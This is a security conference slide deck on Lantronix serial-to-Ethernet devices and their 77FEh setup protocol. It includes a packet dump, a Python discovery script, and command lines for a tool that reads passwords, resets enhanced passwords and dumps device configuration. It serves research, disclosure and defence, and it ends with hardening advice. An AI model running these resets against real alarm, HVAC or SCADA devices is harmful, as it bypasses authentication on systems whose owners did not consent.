If vendors need to expose a serial interface to the "modern" IP world, they often use a ready-made solution such as Lantronix. You can find these devices used by different vendors as part of different embedded systems, from alarms to legacy SCADA systems. If you find such devices on the Internet or on a LAN, the most important thing to check is whether 77FEh is enabled. We will cover the already known 77FEh material, but also new findings on owning such devices.
A new tool to exploit all of this will be presented, as well as counter-measures.
2. 2
Mos
Eisley
Lab
Who are you!?!!??
● Security Jedi at Diverto
  – Bringing balance to the force
● Experience
  – Offensive (penetration tester)
  – Defensive (developer/system administrator/...)
  – Have code in: Nmap, Metasploit, OpenVAS, …
  – Author of free software: https://github.com/kost/
● If you trust in certificates
  – CISSP, C|EH, CISA, CISM, CRISC, MBCI, ...
You can find them as an integral part of
● Alarms
● HVACs
● Pool monitoring systems
● Sprinkler controllers
● Hacked vacuum cleaners (Roombas)
● Embedded systems
● Industrial systems
Source: http://ir.lantronix.com/phoenix.zhtml?c=122202&p=irol-newsA
What are they actually running?
● OS
  – CoBos (mostly)
  – Evolution OS/Linux
  – ThreadX
  – Linux
● Support
  – 1 or more serial ports
  – Modbus (few models)
  – 10/100 Ethernet
Most frequent services available over TCP/IP
● Web (tcp/80): a simple web server, serving an applet JAR which talks to port 30718
● Telnet (tcp/9999): the telnet administration interface
● 77FEh (tcp-udp/30718): what is this?
● SNMP (udp/161): mostly information disclosures
Device Discovery
● Ask :)
● Look, if you have physical access
● Passive
● Active/scanning
  – Standard port scanning is fine with conservative timing
  – Broadcast UDP to the specific Lantronix port (30718)
● Beware
  – Version scanning (-sV) or running vulnerability scanners may misconfigure the device
Telnet administration
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Password :
So, WTF is 77FEh finally?
● 0x77FE = 30718 (decimal)
● TCP/UDP protocol for device setup
  – Proprietary protocol
  – Used by DeviceInstaller (proprietary software from Lantronix)
● Designed for
  – Setup of the device
  – Administration of the device
  – Getting device info
  – Insecurity (sorry, had to write it, you'll see later ;) )
Sample 77FEh communication
./lantronix-witchcraft.pl -vvvvvvvvvvvvvvvv -Q <ip>
[v] Sending 4 bytes:
(00000) 000000f6                                      ....
[v] Received 30 bytes:
(00000) 000000f7 00108005 58324400 df0e0000 ........X2D.....
(00016) 62a7d944 00000000 00204a91 84fb     b..D..... J...
Annotations from the slide: 000000f6 is the query setup request (4 bytes); 000000f7 is the query setup response (4 bytes); 58324400 ("X2D") is the device type; 00204a9184fb is the MAC address of the device (6 bytes).
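The query-setup exchange shown above, as an added example in Python (not code from lantronix-witchcraft or from Lantronix): it builds the 4-byte request, parses the 30-byte reply, and can broadcast the request on UDP/30718 to discover devices the way the Device Discovery slide describes. The field offsets (response code at bytes 0-3, device type at bytes 8-11, MAC at bytes 24-29) are read off the captured reply above and are assumptions, as is the Lantronix OUI check (00:20:4A); the remaining bytes are returned raw. Only the read-only query is sent; nothing here writes setup records.

```python
"""Lantronix 77FEh (tcp-udp/30718) query-setup helper (added example).

Only the read-only "query setup" request (0x000000F6) is ever sent, so this is
no more intrusive than DeviceInstaller's device search. It never writes setup
records.
"""
import socket

LANTRONIX_PORT = 0x77FE  # 30718 decimal

QUERY_SETUP_REQUEST = bytes.fromhex("000000f6")        # 4-byte request
QUERY_SETUP_RESPONSE_CODE = bytes.fromhex("000000f7")  # 4-byte response header
QUERY_SETUP_RESPONSE_LEN = 30

# Assumption: OUI 00:20:4A belongs to Lantronix (verify against the IEEE OUI list).
LANTRONIX_OUI = bytes.fromhex("00204a")

# The 30-byte reply captured on the slide above (copied from the slide, not generated).
CAPTURED_RESPONSE = bytes.fromhex(
    "000000f7 00108005 58324400 df0e0000"
    "62a7d944 00000000 00204a91 84fb"
)


def build_query_request() -> bytes:
    """Return the 4-byte 77FEh query-setup request."""
    return QUERY_SETUP_REQUEST


def parse_query_response(data: bytes) -> dict:
    """Parse a query-setup reply into a dict.

    Offsets are assumptions read off the captured reply:
      bytes  0..3   response code 0x000000F7
      bytes  8..11  device type, NUL-padded ASCII ("X2D" above)
      bytes 24..29  MAC address of the device
    Everything else is returned as hex under 'unparsed' for inspection.
    """
    if len(data) != QUERY_SETUP_RESPONSE_LEN:
        raise ValueError(f"expected {QUERY_SETUP_RESPONSE_LEN} bytes, got {len(data)}")
    if data[:4] != QUERY_SETUP_RESPONSE_CODE:
        raise ValueError(f"unexpected response code {data[:4].hex()}")
    device_type = data[8:12].rstrip(b"\x00").decode("ascii", errors="replace")
    mac = data[24:30]
    return {
        "device_type": device_type,
        "mac": ":".join(f"{b:02x}" for b in mac),
        "lantronix_oui": mac[:3] == LANTRONIX_OUI,
        "unparsed": data[4:8].hex() + " " + data[12:24].hex(),
    }


def discover(broadcast_addr: str = "255.255.255.255", timeout: float = 2.0) -> list:
    """Broadcast the query on UDP/30718 and collect every reply until timeout.

    Returns a list of (source_ip, parsed_reply) tuples. Replies that do not
    parse are skipped rather than raising, since other hosts may answer too.
    """
    found = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        sock.settimeout(timeout)
        sock.sendto(build_query_request(), (broadcast_addr, LANTRONIX_PORT))
        while True:
            try:
                data, (src_ip, _port) = sock.recvfrom(1024)
            except socket.timeout:
                break
            try:
                found.append((src_ip, parse_query_response(data)))
            except ValueError:
                continue
    return found


def query_host(ip: str, timeout: float = 2.0) -> dict:
    """Send the query to a single host over TCP/30718 (unicast check)."""
    with socket.create_connection((ip, LANTRONIX_PORT), timeout=timeout) as sock:
        sock.sendall(build_query_request())
        data = b""
        while len(data) < QUERY_SETUP_RESPONSE_LEN:
            chunk = sock.recv(QUERY_SETUP_RESPONSE_LEN - len(data))
            if not chunk:
                break
            data += chunk
    return parse_query_response(data)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(query_host(sys.argv[1]))
    else:
        for ip, info in discover():
            print(ip, info["mac"], info["device_type"])
```

Run it with no arguments to broadcast on the local segment, or with an IP to query one host over TCP. A reply whose MAC carries the 00:20:4A OUI and whose device type decodes cleanly is a strong sign that 77FEh is reachable and that the device is worth the setup-record checks described later; the -sV warning from the Discovery slide still applies to anything beyond this one query.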
Previous work
● Metasploit
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lant
● Tools
  – Simple C program by jgor
    ● https://github.com/jgor/lantronix-telnet-pw
But...
● Simple password is not set
● Device still asks for a password
● Further digging
  – Enhanced password in place
  – You cannot get/reset the enhanced password easily
  – Length is bigger (4 -> 16)
  – Challenge!!!
Introduction to enhanced passwords
Source: Lantronix documentation

Feature/Type             Simple Password   Enhanced Password
Length                   4                 16
Visible in query setup   yes               no
Enhanced password gone
no password to enter!
$ telnet 192.168.1.101 9999
Trying 192.168.1.101...
Connected to 192.168.1.101.
Escape character is '^]'.
MAC address DEADDEADDEAD
Software version V5.8.8.3 (050801) XPTEXE
AES library version 1.8.2.1
Press Enter for Setup Mode
New tool: lantronix-witchcraft
● 77FEh protocol implementation
● 77FEh security-related utility
● All the tricks mentioned implemented
● Free software: GPL2
● Requirement: Perl
● Available at
  – https://github.com/kost/lantronix-witchcraft
Basic usage:
● Display MAC address:
  – ./lantronix-witchcraft.pl -Q <ip>
● Display simple password (up to 4 characters):
  – ./lantronix-witchcraft.pl -P <ip>
● Reset security record (together with enhanced password):
  – ./lantronix-witchcraft.pl -E <ip>
● Reset security record without AES (with enhanced password):
  – ./lantronix-witchcraft.pl -S <ip>
● Dump setup records:
  – ./lantronix-witchcraft.pl -G -D <ip>
Brave enough?
● One command to rule them all
● Display MAC address and simple password, dump setup records, reset security records together with enhanced password:
  – ./lantronix-witchcraft.pl -C -Q -P -E -G -D <ip>
Correct way
● Ask
  – Someone responsible, whether they could have something like that
● Send a broadcast query packet to 77FEh
● Identify hosts with port 30718 open (TCP or UDP)
● Dump setup records
● Play ;)
● Check if it is still working...
  – If yes, perfect
  – If not: huh, but you should restore the setup records somehow ;)
It's not about Lantronix...
● ...they warned the vendors about it in their documentation
Source: Lantronix documentation
Disclosure Problem
● It's more about vendors who implement Lantronix in their devices
● Whom to report to?
  – Lantronix – I guess they know their protocol ;)
  – OEMs – hard to find all their customers ;)
● Awareness
  – Conference
  – Tools
Recommendations
● Have some other device to VPN/SSL tunnel the services
● Telnet to the administration interface only through VPN or another secure channel
● Disable 77FEh if not needed
● Filter 77FEh on network devices to allowed hosts only
● Disable other unnecessary services (SNMP, telnet, etc.)
Summary
● There are ways to get past authentication (if 77FEh is enabled)
  – Simple passwords
  – Enhanced passwords
● Tools
  – Metasploit Lantronix modules
  – https://github.com/kost/lantronix-witchcraft
● Recommendations
  – Disable 77FEh if not needed, or filter 77FEh on network devices to allowed hosts only
  – Tunnel all communication to these devices over VPN/SSL
● Future
  – There are things to research: a way to obtain the enhanced password or AES keys, for example
Acknowledgements - Thanks
● Previous work (simple passwords)
  – Rob Vinson
    ● http://robvinson.org/blog/2012/07/08/lantronix-serial-to-etherne
    ● https://github.com/robvinson/metasploit-modules
  – Metasploit modules for simple passwords by jgor
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● http://www.rapid7.com/db/modules/auxiliary/scanner/telnet/lan
    ● https://github.com/jgor/lantronix-telnet-pw
● Colleagues
  – Dalibor Dosegović, hardware wizard